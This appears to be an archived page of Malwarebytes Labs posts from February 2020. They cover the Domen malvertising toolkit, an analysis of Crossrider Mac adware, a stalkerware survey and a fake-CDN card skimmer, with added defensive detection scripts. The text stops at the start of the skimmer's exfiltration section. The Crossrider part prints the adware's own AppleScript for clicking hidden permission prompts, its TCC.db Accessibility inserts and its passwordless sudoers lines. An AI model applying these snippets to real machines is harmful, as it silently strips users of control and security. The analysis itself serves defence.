Archive for February, 2020

Domen toolkit gets back to work with new malvertising campaign

Last year, we documented a new social engineering toolkit we called “Domen” being used in the wild. Threat actors were using this kit to trick visitors into visiting compromised websites and installing malware under the guise of a browser update or missing font.

Despite being a robust toolkit, we only saw Domen in sporadic campaigns last year, often reusing the same infrastructure that had already been partially disrupted. However, we recently came across a new malvertising campaign with brand new infrastructure that shows Domen is still being used by threat actors.

Even though Domen shares similarities with other social engineering templates, it is unique in its own ways. The client-side JavaScript responsible for the fake updates is one of the most thorough and professional coding jobs we have seen.

Previously, we had observed Domen pushing the NetSupport RAT and Predator the Thief using its own custom downloader. This time, we noticed a change where the threat actor seems to be experimenting with Smoke Loader, followed by several different payloads.

Domen: the origins

We published our original blog in September 2019, however Domen had been active for several months already. We confirmed this when we found an advertisement posted in a blackhat forum in April 2019 that promoted the toolkit as a way to install EXEs and APKs.

A couple of months after our blog, we observed Domen in another campaign—probably carried out by the same threat actor. However, unlike the former one that had been used on compromised websites, this time it was via a malvertising chain (celeritascdn[.]com) leading to a decoy adult site hosted at tendermeets[.]club (a copycat of ftvgirls[.]com).

The reason we believe the two campaigns are related is because the delivery vector for the payload uses the same technique, namely uploading malicious files to Bitbucket.

Between the end of November 2019 and most of February 2020, Domen fell fairly silent.

Latest Domen campaign

On February 19, we caught a new malvertising chain with new domains, this time using a VPN service as a lure.

The threat actor had just created new infrastructure to host the fraudulent page (search-one[.]info), the download site (mix-world[.]best), and the backend panel (panel-admin[.]best).

The payload in this infection chain is Smoke Loader. In one instance, Smoke Loader distributed several secondary payloads, including the IntelRapid cryptominer, a Vidar stealer, and Buran ransomware.

This is an interesting payload combination that seems to be more common these days.

More social engineering schemes

Domen is a well-made toolkit that has been used to distribute a variety of payloads by using tried and tested social engineering tricks. While tracking its author (or distributor), we noticed other forum postings advertising the same sort of payload installs, but using different and creative themes.

The concept is the same, namely, those bogus sites are tempting users to download software that happens to be malware.

Since the decline in browser exploits in recent years, threat actors have migrated toward other infection vectors. As far as web threats are concerned, social engineering remains highly effective.

Malwarebytes business and Malwarebytes for Windows Premium users are already protected against this distribution campaign and its accompanying payloads.

Indicators of Compromise

Domen toolkit

Smoke Loader
The post Domen toolkit gets back to work with new malvertising campaign appeared first on Malwarebytes Labs.


Mac adware is more sophisticated and dangerous than traditional Mac malware

As the data revealed in our State of Malware report showed, Mac threats are on the rise, but they are not the same type of threats experienced by Windows users. Most notably, more traditional forms of malware, such as ransomware, spyware, and backdoors account for over 27 percent of all Windows threats. That figure is less than 1 percent for Macs.

Further, Mac malware is rather unsophisticated overall. The remaining 99+ percent of Mac threats are “just” adware and potentially unwanted programs (PUPs). This has led some in the Mac community to dismiss these findings as unimportant, even leading one Mac blogger to write:

“Macs don’t get viruses” is a statement that is still overwhelmingly true.

However, adware and PUPs can actually be far more invasive and dangerous on the Mac than “real” malware. They can intercept and decrypt all network traffic, create hidden users with static passwords, make insecure changes to system settings, and generally dig their roots deep into the system so that it is incredibly challenging to eradicate completely.

To demonstrate our meaning, what follows is a detailed analysis of what may be the most sophisticated threat on macOS—called Crossrider—a threat that is “just adware.”

Mac adware installation

Crossrider, also known as Bundlore or SurfBuyer, is detected by Malwarebytes as Adware.Crossrider. Its installer script also carries a list of the many brand names it has been distributed under:

brands=(flashmall webshoppers webshoppy smartshoppy shoptool shoppytool coolshopper easyshopper liveshoppers smart-shoppy easy-shopper bestwebshoppers hotshoppy bestsmartshoppers myshopmate myshopbot surfmate surfbuyer couponizer shoppinizer shopperify mycouponize myshopcoupon mycouponsmart)

Whatever you call it, it’s been around for at least six or seven years, and has evolved fairly frequently during that time.

The first stage installer was found from analysis of a “weknow” uninstaller, which contained a link to a shell script. (The name “weknow” comes from one of many websites used by this adware.) This shell script, which kicks off the entire installation process, consists of around 300 lines of code—a fairly modest script that doesn’t take long to download.

Despite its relatively small size, the script opens a deep rabbit hole, downloading and executing a large number of other files. Since much of the code that gets executed is downloaded, the exact payload of the adware can be changed at a moment’s notice, and can vary depending on all manner of variables, such as where you’re located, whether your machine has been seen before, what else is installed, etc. Further, should any of the various delivery servers be hacked by a more malicious actor, those scripts could be used to deploy more malicious payloads.

Next, after conducting brief tracking data collection and uploading it to a server, Crossrider downloads a file from the following URL:

This file is expanded into an app whose sole purpose is to phish the user’s password by displaying a fake authentication prompt. The password is returned to the script, in plain text, where it is used repeatedly to install the rest of the components.

[Image: the fake authentication prompt the adware uses to phish the password]

The script next determines the version of the system and performs one set of actions on macOS 10.11 and higher, and another on older systems.

Installation on 10.11 and up

On newer systems, a compressed app bundle is downloaded and executed, using the phished password so that it runs as root:

This app obscures the screen, during which time it installs a large number of files. As part of this process, it also makes a copy of Safari that is modified to automatically enable certain Safari extensions when opened, without user actions required.

[Image: the screen as obscured during installation]

Although these modifications to Safari break its code signature, which can be used to validate that an app has not been modified by someone other than its creator, macOS will still happily run it because of limitations on when these code signatures are actually checked.

After this process completes, the copy of Safari is deleted, leaving the real copy of Safari thinking that it’s got a couple additional browser extensions installed and enabled.

Installation on 10.10 and older

On older systems, Crossrider downloads the following file:

This is extracted, and a script it contains is executed. This script alone has over 900 lines of code, and it runs a number of other scripts and processes to make changes to Safari and Chrome settings and install browser extensions.

In the case of Safari, part of the process involves an AppleScript that enables an accessibility setting that provides keyboard access to all controls—and then uses that access to click the “Allow” button in the window Safari displays when the user tries to install a Safari extension.

-- Push every Safari window far off screen so the user never sees the prompt
tell application "Safari" to set bounds of windows to {0, 0, -1000, -1000}
tell application "System Events"
    set visible of process "Safari" to false
    tell application process "Safari"
        set frontmost to true
        log "Clicking button 1 of sheet 1"
        -- With keyboard access to all controls enabled, press the sheet's first button (the "Allow" button)
        tell window 1 to tell sheet 1 to click button 1
        delay 1
    end tell
end tell

The script sneakily moves the window offscreen, so the user doesn’t see any of this happen during the installation process. All the user might see is that Safari briefly opens and then closes.

Next, a native Mac binary (like an app, but meant to be executed from the command line rather than through the Finder) is downloaded:

Among other files, this process, when executed, will install a component into the Applications folder, and then run a nearly 750-line shell script to make further browser changes.

Tracking data

Throughout the installation process, the various scripts and processes will repeatedly report data back to a variety of tracking servers. These transactions send potentially sensitive data, such as:

  • a unique identifier for the computer
  • IP address
  • the user name
  • macOS version
  • Safari version
  • Chrome version
  • a list of everything found in the Applications folder
  • a list of all installed agents and daemons
  • a list of all installed system configuration profiles
  • the version of the Malware Removal Tool, a security component of macOS designed to remove certain known pieces of malware

Since much of this data is obtained through scripts and processes that are downloaded from more than one server, the exact data being collected and where it’s being sent can be changed dynamically.

Changes to the system

There are a number of changes made throughout the system, some of them dangerous and difficult to remove for the average person. This makes Crossrider one of the most invasive threats I’ve ever seen on macOS.

System configuration profiles

These profiles are typically used by an IT admin to manage computers, often remotely. However, profiles can also be installed manually, via a .mobileconfig file, and the adware does exactly that.

[Image: payload template from the .mobileconfig file]

The profile that is installed locks the home page and search engine settings in both Safari and Chrome, preventing them from being changed by the user until the profiles are removed.

Managed preferences

A managed preference is another method for changing settings that is managed by an IT admin. On older systems, the adware installs managed preference files that set Chrome’s preferences to pages associated with the adware.

[Image: contents of the managed preferences file]

Changes to the sudoers file

On Unix-based systems, like macOS, the user with the highest level of permissions is the root user. On such systems, the sudoers file is a file that identifies which users are allowed to have root-level access, and how they’re allowed to get it.

Crossrider adware makes changes to the sudoers file in multiple places. In one, lines are added that let two of the installed binaries run as root, without a password, from the current user’s account:

someuser ALL=NOPASSWD:SETENV: /Users/someuser/Applications/MyMacUpToDate/MyMacUpToDate
someuser ALL=NOPASSWD:SETENV: /Users/someuser/Applications/UpToDateMac/UpToDateMac

In some cases, the installation process hits a snag and fails to write these changes properly, which invalidates the sudoers file and breaks sudo entirely, so nobody can obtain root permissions through it. This can affect software installation and the ability to troubleshoot, and is difficult to fix: repairing the sudoers file requires root access, which you can’t get through sudo because the sudoers file is broken. It is a catch-22 unless you can obtain a root shell some other way, such as from macOS Recovery.

In other parts of the installation process, the adware gives all processes running for the user unlimited access to root without a password. The scripts try to revert these changes, but may not always be successful (such as if the script or process crashes).


These changes could be hijacked by other malicious software. For example, if a piece of malware were to overwrite the MyMacUpToDate or UpToDateMac binaries in the first example, which any code running as that user could do because they live in the user’s own home directory, it could escalate to root to do more damage. In the latter example, any process would be able to elevate to root access unconditionally.


Changes to the TCC.db database

In several places, the installation process will attempt to modify the TCC.db database. This database identifies which permissions the user has given to different processes, such as whether an app can access your calendar, your contacts, your computer’s microphone, your webcam, or certain folders on your system.

This adware attempts to give itself and a wide swath of other processes one of the most powerful capabilities: Accessibility access. This permission allows these processes to control other processes, which can be used to capture sensitive data, among other things.

if [[ "${osxVer}" == *"10.11"* ]] || [[ "${osxVer}" == *"10.12"* ]]; then
    # Columns of the 10.11/10.12 access table: service, client, client_type
    # (0 = bundle identifier, 1 = absolute path), allowed, prompt_count, csreq, policy_id.
    # The heredoc is unquoted, so ${TCCDB} and ${TMPDIR} are expanded by the shell.
    /usr/bin/sqlite3 <<EOF
.open '${TCCDB}'
insert or replace into access values('kTCCServiceAccessibility','',0,1,1,NULL,NULL);
insert or replace into access values('kTCCServiceAccessibility','/bin/bash',1,1,1,NULL,NULL);
insert or replace into access values('kTCCServiceAccessibility','/bin/sh',1,1,1,NULL,NULL);
insert or replace into access values('kTCCServiceAccessibility','/usr/bin/sudo',1,1,1,NULL,NULL);
insert or replace into access values('kTCCServiceAccessibility','${TMPDIR}/.tmpma/',1,1,1,NULL,NULL);
insert or replace into access values('kTCCServiceAccessibility','com.stubberify.mym',0,1,1,NULL,NULL);
insert or replace into access values('kTCCServiceAccessibility','com.tostubornot.mym',0,1,1,NULL,NULL);
insert or replace into access values('kTCCServiceAccessibility','com.trustedmac.service',0,1,1,NULL,NULL);
insert or replace into access values('kTCCServiceAccessibility','com.autobots.transform',0,1,1,NULL,NULL);
insert or replace into access values('kTCCServiceAccessibility','',0,1,1,NULL,NULL);
insert or replace into access values('kTCCServiceAccessibility','',0,1,1,NULL,NULL);

This only works on older systems: on recent versions of macOS, TCC.db is protected by System Integrity Protection and cannot be written by anything other than the system. However, on an older system, this can grant powerful permissions that could be abused by future updates of the adware, or by malware attempting to escalate its access to user data. Note that granting Accessibility to /bin/bash and /bin/sh extends it to any script those interpreters run.
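To show what such a modified database looks like and how one would audit it, here is an added example that is not from the original post or from the adware: it builds a constructed in-memory copy of the 10.11-era access table (the seven-column layout is assumed from the inserts quoted above), applies the adware’s own rows plus one hypothetical legitimate grant for com.apple.Terminal, and lists the Accessibility grants a stock system would not have. Passing the path of a copied TCC.db audits that file instead.

```python
import sqlite3
import sys
from typing import List, Tuple

# Layout of the 'access' table as assumed for 10.11/10.12, matching the seven-value
# inserts quoted above; newer macOS versions add further columns.
SCHEMA = """
CREATE TABLE access (
    service      TEXT    NOT NULL,
    client       TEXT    NOT NULL,
    client_type  INTEGER NOT NULL,   -- 0 = bundle identifier, 1 = absolute path
    allowed      INTEGER NOT NULL,
    prompt_count INTEGER NOT NULL,
    csreq        BLOB,
    policy_id    INTEGER,
    PRIMARY KEY (service, client, client_type)
);
"""

# The rows the installer script inserts, with its unexpanded ${TMPDIR} kept as is.
ADWARE_ROWS = [
    ("kTCCServiceAccessibility", "", 0),
    ("kTCCServiceAccessibility", "/bin/bash", 1),
    ("kTCCServiceAccessibility", "/bin/sh", 1),
    ("kTCCServiceAccessibility", "/usr/bin/sudo", 1),
    ("kTCCServiceAccessibility", "${TMPDIR}/.tmpma/", 1),
    ("kTCCServiceAccessibility", "com.stubberify.mym", 0),
    ("kTCCServiceAccessibility", "com.tostubornot.mym", 0),
    ("kTCCServiceAccessibility", "com.trustedmac.service", 0),
    ("kTCCServiceAccessibility", "com.autobots.transform", 0),
    ("kTCCServiceAccessibility", "", 0),
    ("kTCCServiceAccessibility", "", 0),
]

INTERPRETERS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/bin/ksh",
                "/usr/bin/osascript", "/usr/bin/python"}
TEMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "${TMPDIR}")


def build_sample_db() -> sqlite3.Connection:
    """Constructed in-memory TCC.db: one hypothetical legitimate grant plus the adware rows.
    INSERT OR REPLACE on the primary key collapses the three empty-client rows into one."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.execute("INSERT INTO access VALUES (?,?,?,1,1,NULL,NULL)",
                 ("kTCCServiceAccessibility", "com.apple.Terminal", 0))
    for row in ADWARE_ROWS:
        conn.execute("INSERT OR REPLACE INTO access VALUES (?,?,?,1,1,NULL,NULL)", row)
    conn.commit()
    return conn


def suspicious_accessibility_grants(conn: sqlite3.Connection) -> List[Tuple[str, str]]:
    """Return (client, reason) for Accessibility grants a stock system would not carry."""
    flagged = []
    for client, client_type in conn.execute(
        "SELECT client, client_type FROM access "
        "WHERE service = 'kTCCServiceAccessibility' AND allowed = 1"
    ):
        if client == "":
            reason = "empty client identifier"
        elif client_type == 1 and client in INTERPRETERS:
            reason = "script interpreter granted Accessibility (any script inherits it)"
        elif client_type == 1 and client == "/usr/bin/sudo":
            reason = "sudo granted Accessibility"
        elif client_type == 1 and client.startswith(TEMP_PREFIXES):
            reason = "grant to a path in a temporary directory"
        elif client_type == 1 and not client.startswith(("/Applications/", "/System/")):
            reason = "path-based grant outside /Applications or /System"
        else:
            # Bundle-identifier grants have to be compared against the apps actually
            # installed on the machine; that step is not attempted here.
            continue
        flagged.append((client, reason))
    return flagged


if __name__ == "__main__":
    # Give the path of a copy of a real TCC.db to audit it; otherwise use the sample.
    conn = sqlite3.connect(sys.argv[1]) if len(sys.argv) > 1 else build_sample_db()
    for client, reason in suspicious_accessibility_grants(conn):
        print(f"{client or '<empty>'}: {reason}")
```

The bundle-identifier rows (com.stubberify.mym and the rest) pass through unflagged on purpose: they can only be judged against an inventory of what is actually installed, which is the next check a responder would add.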

Browser extensions

Several browser extensions are installed for either Safari or Chrome or both, depending on the version of the system and versions of Safari and Chrome. These extensions give the adware greater capability to control the behavior of the browser.

Ordinarily, addition of a browser extension requires the user to confirm, for the express purpose of preventing adware or malware from surreptitiously installing a browser extension. However, this adware uses a number of shady tricks—such as the modified copy of Safari mentioned previously—to get these extensions installed without the user needing to approve them or even being aware they’ve been installed.

Browser extensions can gather an intrusive level of information from the browser: essentially, any data that may be displayed on a website or entered into a form on a website. The latter can include sensitive data, such as usernames, passwords, and credit card numbers.

Launch agents and daemons

Launch agents and daemons provide one of the most common ways for processes to stay persistently running on macOS. Crossrider adware installs multiple agents or daemons, depending on which files are being installed. Fortunately, these are extremely easy to spot for someone knowledgeable—in fact, they’re one of the first things a tech might look for—and are relatively easy to remove.

Malware must be worse, right?

Fortunately (or unfortunately, depending on how you look at it), no. Contrast Crossrider adware with some nation-state malware, such as malware made by North Korea’s Lazarus group or the OceanLotus malware thought to be created by Vietnam. Such malware typically installs a single launch agent or daemon, easily spotted by any expert who looks at the machine. Crossrider’s installation process alone far exceeds these forms of malware in sophistication.

Mac malware tends not to be particularly sophisticated. Of course, this doesn’t mean it can’t be dangerous, but right now, it’s sitting at the malware kiddy table. Simply put: It’s not sophisticated because it doesn’t have to be. If you’re a Mac user infected with malware, there are probably not going to be any outward symptoms you’d notice.

In contrast, adware is highly noticeable, since it changes the behavior of your computer, most typically your web browser. For this reason, Mac adware has had to evolve well beyond Mac malware, and has become far sneakier and harder to get rid of.

What’s the takeaway?

Although many Mac experts like to dismiss adware as a non-issue, saying people only get infected when they do “stupid things,” most of the most massive data breaches and damaging ransomware attacks on Windows machines happen because of user negligence: leaving data exposed on the Internet, opening malicious links via phishing email, or failing to patch software in a timely manner.

Adware is a growing problem on the Mac—and on Windows and Android operating systems as well. It was the most prevalent threat across all regions globally, for both consumers and businesses. And we saw that some Mac adware was actually more prevalent than most Windows threats in 2019.

Worse, these adware infections are usually more severe than a malware infection, opening up potential security holes that could be taken advantage of by more malicious threats and proving arduous to get rid of. In addition, adware on the Mac also commonly intercepts and decrypts all network traffic, uses randomly generated names for installed files, uses analysis avoidance techniques to prevent researchers from analyzing them, creates hidden users on the system with known passwords, and more.

All in all, if I had to choose between one or the other, I would willingly infect my own machine with most of the Mac malware out there before I would do the same with Mac adware. Mac malware often makes me laugh. Mac adware sometimes gives me chills.


The following indicators of compromise are associated with this adware.


Files (SHA-256):

441fa62645591b2aa1b853ebfa51fe5bb36e6464ad3a4ff58a0b8297bea851d9
mm-install-macos
  ee94315a1099a982a2b61878a64ee6fe9134e544cdcae565995948a8ca843e51
webtools
  888a1f9dfadde892496a3214ceb2a5a62a3997381ba6dbcd4e741d033352fd31
imsearch.tar.gz
  e07c9e59f7621eead7300cfe264a2d24a7749d592d8a2b32c48125eadf293f08
  591919f7b5ced77431990e7e9f257ce049f1fb2f93e9cdcb19b5400060518031
iwt.bin
  168d9c1a06ab3f633e6fc724834ad8a9f4dc3c71945a34342347ce0df042a361
  df402cf21e5f78e55050d7ee14c050869d477faaeb58ab841f5992a0638a4a9f
installSafariExtension
  212a954a7b67e851063daa2acabe841e8e54a4c29ca4f1fc096a160f1764aa14
installSafariHpNt
  18b449b7d25733557d305b8a8ae9b331e628ec892996a83a39cb74bf2a7eca9a
  b5ac18d3ea66dfad4baf02efad1a2f27f8134a2cd0f3c1d78e44d49bed613064
  6180666302bbf8032801d0aec6df08fbd27349c9d628f3a3dd7295256bf751b6

Thanks to Aditya Raj Das for finding the sample and assisting with the analysis!

The post Mac adware is more sophisticated and dangerous than traditional Mac malware appeared first on Malwarebytes Labs.


Stalkerware and online stalking are accepted by Americans. Why?

Despite warnings from domestic abuse networks, privacy rights advocates, and a committed faction of cybersecurity vendors, Americans may be accepting and minimizing online stalking behaviors, including the use of invasive apps that can pry into a user’s text messages, emails, photos, videos, and phone logs.

The limited opposition to these at-times abusive behaviors was revealed by a new study conducted by NortonLifeLock, a consumer cyber safety vendor and founding member of the Coalition Against Stalkerware, which Malwarebytes helped form last year.

The distressing survey revealed that nearly half of individuals between the ages of 18 and 34 said they found online stalking to be “harmless.” Further, the study revealed that 1 in 10 Americans admitted to using digital monitoring apps—sometimes referred to as stalkerware—against their ex or current romantic partners.

How did we get here?

Unfortunately, we cannot say for certain whether the NortonLifeLock survey results represent a shift in attitudes or reflect a long-held acceptance of surveillance culture online. While US government agencies have recorded stalking statistics for decades, those same agencies either have not recorded admissions of online stalking behavior and perceptions of its harms, or did not respond to requests for such data.

However, domestic abuse advocates and researchers agreed that several factors play a role in the public’s acceptance of this type of behavior. Many romantic comedy films romanticize stalking, while a growing number of consumer home devices have normalized private, digital surveillance. Further, current mobile apps have turned the viewing of someone’s private life into an otherwise harmless interaction.

More likely, though, is that the public has always failed to recognize and respond to the actual harms of stalking, said Elaina Roberts, technology safety legal manager with the National Network to End Domestic Violence.

“This is an age-old crime and people’s perceptions of it, in my opinion, haven’t changed all that much,” Roberts said.

The NortonLifeLock Online Creeping Survey

In conjunction with The Harris Poll, NortonLifeLock surveyed more than 2,000 adults in the United States about “online creeping”—behavior that includes consistent, stealthy tracking of someone online, which could also veer into behavior that is more akin to cyber stalking.

Overall, the survey found that 46 percent of respondents admitted to “stalking” an ex or current partner online “by checking in on them without their knowledge or consent.”

The most common forms of online stalking included checking a current or former partner’s phone—at 29 percent—and looking through a partner’s search history on one of their devices without permission—at 21 percent. Disturbingly, 9 percent of respondents admitted to creating a fake social media profile to check in on their partners, and 8 percent of respondents admitted to tracking a partner’s physical activity through their phone or through a health-related app.

Kevin Roundy, technical director for NortonLifeLock, warned about these behaviors.

“Some of the behaviors identified in the NortonLifeLock Online Creeping Survey may seem harmless, but there are serious implications when this becomes a pattern of behavior and escalates, or when stalkerware and creepware apps get in the hands of an abusive ex or partner,” Roundy said.

When asked why respondents engaged in these behaviors, the top two answers revealed a lack of trust and an itching, potentially harmful level of concern; 44 percent said “they didn’t trust [their partner] or suspected they were up to no good,” while 38 percent said they were “just curious.”

The gender disparity in the results was clear. In seemingly every category, men found it more acceptable to engage in these behaviors and to have these behaviors enacted against them.

While 35 percent of respondents said “they don’t care if they are being stalked online by a current or former partner as long as they are not being stalked in person,” it was 43 percent of men who agreed with that statement versus 27 percent of women. Further, 20 percent of men said they tracked a current or former partner’s location, versus 13 percent of women. Men also showed that they more readily accepted online stalking if one or both of the partners in a relationship had cheated or were merely suspected of cheating.

These results reflect broader statistics in America about who is more often victimized by stalking.

According to a national report of about 13,000 interviews conducted by the Centers for Disease Control and Prevention (CDC), an estimated 15.2 percent of women and an estimated 5.7 percent of men have been stalked in their lifetime. Women who said they were stalked during their lifetimes stated they were the target of a variety of behaviors, including being approached at home or work (61.7 percent); receiving unwanted messages like texts and voice mails (55.3 percent); and being watched, followed, or spied on with a “listening device, camera, or GPS device” (49.7 percent).

When asked if the CDC records the rate of admission of stalking behavior and perceptions to stalking behavior, a spokesperson said the agency does not keep such statistics.

The Bureau of Justice Statistics, which also tracks stalking in America, did not respond to a request for similar data.

Despite the two agencies’ robust datasets on the threat of stalking, the NortonLifeLock survey revealed a different perspective on similar behavior—a potentially concerning coziness with it. Young Americans in particular, the survey showed, found little threat in online stalking.

The survey said that 45 percent of those aged 18–34 found online stalking to be “harmless.” The same age group most heavily engaged in the behavior—65 percent said they have “checked in on a current or former significant other.”

Domestic abuse advocates argue that those high statistics reflect a society that fails to fully recognize the harms of stalking, cyberstalking, and invasive behavior toward romantic partners. Further, the language actually used in the survey might point to less nefarious interpretations by young people.

The normalization and minimization of stalking

Despite the NortonLifeLock study revealing troubling perceptions of online stalking behavior, Erica Olsen, director of Safety Net at the National Network to End Domestic Violence, said these perceptions existed long before the advent of technology-enabled abuse. It’s been happening for decades, Olsen said.

“I unfortunately think that stalking behaviors have always, to some extent, been accepted and minimized,” Olsen said. “I think a lot of it has to do with the romanticizing of some of the behaviors—specifically following and spying.”

Olsen pointed to many romantic comedies that portray stalking as endearing.

In The Graduate, Dustin Hoffman’s character follows Katharine Ross’s character despite explicitly being told to drop contact, much like John Cusack’s character in Say Anything ignores the wishes of his ex-girlfriend played by Ione Skye. The 1954 film Seven Brides for Seven Brothers involves several men who kidnap a group of women, and no, it isn’t a horror movie.

As the New Statesman wrote:

“A group of brothers kidnap six attractive women by causing a life-threatening avalanche that keeps them imprisoned all winter. The women play pranks on the men in revenge, and, in a shocking case of Stockholm syndrome, everyone has an all-round jolly time. They pair off and are all married by summer.”

These types of films can impact audience perceptions of intrusive and aggressive behavior, found Julia Lippman, a research fellow at the Center for Political Studies-Institute for Social Research at the University of Michigan.

According to Lippman’s paper, “I Did It Because I Never Stopped Loving You: The Effects of Media Portrayals of Persistent Pursuit on Beliefs About Stalking,” women who watched movies with positive portrayals of aggressive romantic pursual were more likely to accept those behaviors, as opposed to women who watched movies with scary or threatening depictions of those same types of behaviors.

In speaking to the online outlet Bustle, Lippman said:

“Positive media portrayals of stalking—like those where the pursuer is rewarded by ‘getting the girl’— can lead people to see stalking in a more positive light.”

Media portrayals aside, another factor could play a role in the public’s acceptance of online stalking that amounts to digital surveillance—the privatization of surveillance in our own neighborhoods. Millions of smart doorbells have crept into countless suburbs across America, capturing footage of package thieves, yes, but, more often, of neighbors, children, and animals engaged in harmless behavior.

According to a survey conducted by The Washington Post, smart doorbell owners who understood the privacy risks of their devices said the risks were not enough to deter them from ownership. As The Washington Post wrote:

“[In] the unscientific survey, most people also replied that they were fine with intimate new levels of surveillance—as long as they were the ones who got to watch.”

Finally, the acceptance of “online stalking” by younger generations could intersect with emerging ways of staying in touch with one another, and with the language that young people—particularly teenagers—use.

Diana Freed, a PhD student at the Intimate Partner Violence tech research lab led by Cornell Tech faculty, said that, in her research, she has found that teenagers often use the term “stalking” in a harmless way to check in on people online.

“It’s a very common term used with teens—‘Let’s stalk that person on Instagram,’—but they’re not saying it with the intent to harm,” Freed said.

(Full disclosure, when this Malwarebytes Labs writer attended college, he frequently heard the words “Facebook stalk” used to describe looking up a romantic crush, whether that meant viewing their photos or trying to find their “Relationship Status.”)

Freed said many apps also provide an opportunity for “wholesome” viewing of other people’s lives. With features like TikTok’s constant video feed or Snapchat Stories and Instagram Stories—which give users the ability to post photos and short videos for only 24 hours—users can view another user’s daily activities, despite being physically separated. That type of behavior does not have to be covert, Freed said, and can be done “with full knowledge” between two people who are friends offline.

“The ability to follow people closely is made available to us just by the features offered,” Freed said.

As to whether the presence of the technology itself—including stalkerware-type apps—has somehow created more stalkers, no expert interviewed for this piece saw a provable correlation.

Roberts of NNEDV said that even before the proliferation of GPS devices and stalkerware, domestic abusers would excuse their persistent, physical following of their partners by saying they were merely concerned for their partner’s safety. Today, she said, abusers use the same lies—urging survivors to use GPS location apps or stalkerware as a way to ensure safety.

“So, while we can potentially say that people are just more inclined to be accepting of this behavior today,” Roberts said, “I believe the truth is that people have always minimized these types of ‘caring’ behaviors as they appear to be done out of concern.”

Moving forward

All of this presents two concerning realities—Americans are growing warm to online stalking; Americans have always accepted stalking. Neither is the type of reality that should go unopposed.

Remember, online stalking that violates a person’s privacy is not harmless. Many of the behaviors described in the survey are the same types of behaviors that domestic abuse survivors face every day, from using stalkerware to learn private information, to tracking a person’s GPS location as a means to find them to inflict violence.

For years, Malwarebytes has worked to detect and raise awareness about invasive monitoring apps that can pry into users’ lives without their consent. This latest survey only proves that more work is needed. We’re ready for it.

The post Stalkerware and online stalking are accepted by Americans. Why? appeared first on Malwarebytes Labs.

Posted in: NEWS


Fraudsters cloak credit card skimmer with fake content delivery network, ngrok server

Threat actors love to abuse legitimate brands and infrastructure—this, we know. Last year we exposed how web skimmers had found their way onto Amazon’s Cloudfront content delivery network (CDN) via insecure S3 buckets. Now, we discovered scammers pretending to be CDNs while exfiltrating data and hiding their tracks—another reason to keep a watchful eye on third-party content.

Sometimes, what looks like a CDN may turn out to be anything but. Using lookalike domains is nothing new among malware authors. One trend we see a fair bit with web skimmers in particular is domains that mimic Google Analytics: practically all websites use this service for their ranking and statistics, so it makes for credible copycats.

In the latest case, we caught scammers using two different domains pretending to be a CDN. While typically the second piece of the infrastructure is used for data exfiltration, it only acts as an intermediary that attempts to hide the actual exfiltration server.

Oddly, the crooks decided to use a local web server exposed to the Internet via the free ngrok service—a reverse proxy software that creates secure tunnels—to collect the stolen data. This combination of tricks and technologies shows us that fraudsters can devise custom schemes in an attempt to evade detection.

Inspecting code for unauthorized third-parties

We identified suspicious code on the website for a popular Parisian boutique store. However, to the naked eye, the script in question looks just like another jQuery library loaded from a third-party CDN.

Figure 1: Compromised online store, with source code showing a CDN-like domain

Although the domain name (cdn-sources[.]org) alludes to a CDN, and unveil.js is a legitimate library, a quick look at the content shows some inconsistencies. There should not be fields looking for a credit card number for this kind of plugin.

Figure 2: A malicious third-party library impersonating a legitimate one

To clear any doubts, we decided to check an archived copy of the site and compared it with a live snapshot. We can indeed see that this script did not exist just a couple of weeks prior. Either it was added by the site owner, or in this case, injected by attackers.

Figure 3: Snapshots comparing online store before and after the hack

The script checks for the current URL in the address bar and if it matches with that of a checkout page, it begins collecting form data. This typically includes the shopper’s name, address, email, phone number, and credit card information.
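The before/after comparison described above can be automated: pull the script tags out of an archived snapshot and a live snapshot, and report any external script host that appears only in the live copy, with a note when the host is not on the shop's known list or merely sounds like a CDN. This is an added example, not Malwarebytes' tooling or anything from the compromised store; the two HTML snapshots, the allowlist and the hostnames (`shop.example`, `cdn-sources.example`) are constructed placeholders.

```python
"""Compare two HTML snapshots of a page and report newly added external scripts.

Added example (not Malwarebytes' tooling). The snapshots below are constructed;
the allowlist of known script hosts is an assumption for this shop.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this shop is known to load scripts from (assumed allowlist).
KNOWN_SCRIPT_HOSTS = {"code.jquery.com", "www.googletagmanager.com"}


class ScriptCollector(HTMLParser):
    """Collects the src attribute of every <script> tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.sources.append(value)


def script_sources(html):
    parser = ScriptCollector()
    parser.feed(html)
    return parser.sources


def external_hosts(html, site_host):
    """Return {host: [urls]} for script sources served from a host other than the site's own."""
    hosts = {}
    for src in script_sources(html):
        # Protocol-relative URLs ("//cdn.example/x.js") parse once a scheme is prefixed.
        url = "https:" + src if src.startswith("//") else src
        host = urlparse(url).hostname
        if host and host != site_host:
            hosts.setdefault(host, []).append(src)
    return hosts


def new_third_party_scripts(archived_html, live_html, site_host):
    """Scripts present in the live snapshot but absent from the archived one,
    each tagged with the reasons it deserves a closer look."""
    before = external_hosts(archived_html, site_host)
    after = external_hosts(live_html, site_host)
    findings = []
    for host, srcs in after.items():
        if host in before:
            continue
        reasons = []
        if host not in KNOWN_SCRIPT_HOSTS:
            reasons.append("host not on allowlist")
            if "cdn" in host:
                reasons.append("CDN-sounding name on unknown host")
        findings.append({"host": host, "scripts": srcs, "reasons": reasons})
    return findings


# Constructed snapshots: the "live" copy gained one script from a CDN-sounding host.
ARCHIVED = """<html><head>
<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
<script src="/js/checkout.js"></script>
</head></html>"""

LIVE = ARCHIVED.replace(
    "</head>",
    '<script src="//cdn-sources.example/unveil.js"></script>\n</head>',
)

if __name__ == "__main__":
    for f in new_third_party_scripts(ARCHIVED, LIVE, "shop.example"):
        print(f["host"], f["scripts"], "; ".join(f["reasons"]))
```

Running it against the constructed snapshots reports the single added host, `cdn-sources.example`, as both off the allowlist and CDN-sounding; the first-party `/js/checkout.js` and the already-present jQuery host are left alone. In practice the archived copy would come from a web archive or the shop's own deployment history, and the allowlist from whoever owns the site.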

Figure 4: Another fake CDN domain used as part of the data exfiltration process

Data exfiltration via ngrok server

